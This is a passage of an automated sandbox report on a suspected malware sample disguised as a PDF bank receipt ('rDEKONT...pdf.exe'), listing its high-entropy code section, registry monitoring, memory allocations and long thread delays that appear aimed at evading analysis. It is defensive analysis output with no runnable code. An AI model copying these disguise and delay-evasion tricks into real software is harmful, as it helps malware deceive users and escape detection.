                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CEBFB push ecx; ret 0_2_060CEBFC
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827729B pushad ; retf 0_2_082772A1
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: section name: .text entropy: 7.683784572394097
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 83C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 93C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 9590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: A590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: A930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: B930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: C930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599193Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598532Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598407Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598282Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597451Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596740Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596474Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596259Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596157Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 596040Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595592Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeWindow / User API: threadDelayed 2069Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeWindow / User API: threadDelayed 7755Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 3628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599782s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599193s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -598063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597451s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596740s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596474s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596259s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596157s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -596040s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595592s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe TID: 7276Thread sleep time: -594860s >= -30000sJump to behavior
